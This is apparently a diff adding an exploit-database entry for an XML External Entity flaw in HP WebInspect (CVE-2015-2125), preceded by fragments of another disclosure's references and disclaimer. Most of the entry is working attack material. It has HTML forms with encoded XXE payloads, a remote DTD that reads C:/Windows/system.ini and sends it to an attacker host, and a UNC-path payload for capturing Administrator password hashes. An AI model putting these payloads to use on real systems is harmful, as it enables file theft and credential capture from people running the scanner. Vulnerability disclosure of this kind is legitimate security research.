 CVE Assign - http://seclists.org/oss-sec/2015/q2/471
 http://packetstormsecurity.com/files/131955/
 https://wpvulndb.com/vulnerabilities/7992
 ## Disclaimer:
 This disclosure is purely meant for educational purposes. I will in no way
 be responsible as to how the information in this disclosure is used.
--- a/platforms/xml/webapps/37250.txt
+++ b/platforms/xml/webapps/37250.txt
@ -0,0 +1,41 @@
 # Exploit Title: HP WebInspect - XML External Entity
 # Date: 23\04\2015
 # Exploit Author: Jakub Palaczynski
 # Vendor Homepage: http://www.hp.com/
 # Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
 # CVE : CVE-2015-2125
 1. Create website that exploits vulnerability.
 1.1. Website that steals files using OOB technique:
 1.1.1. Website that triggers vulnerability:
 <html>
 <body>
 <form action="/" method="POST">
 <input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
 <input type="submit" value="Submit" />
 </form>
 </body>
 </html>
 1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent:
 <!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">
 <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>">
 1.2. Website that steals hashes of Administrator user:
 1.2.1. Website that triggers vulnerability:
 <html>
 <body>
 <form action="/" method="POST">
 <input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
 <input type="submit" value="Submit" />
 </form>
 </body>
 </html>
 1.2.2. Attacker needs to start tool on the server that captures hashes.
 2. Exploit is triggered while profiling or scanning created application using vulnerable versions of HP WebInspect.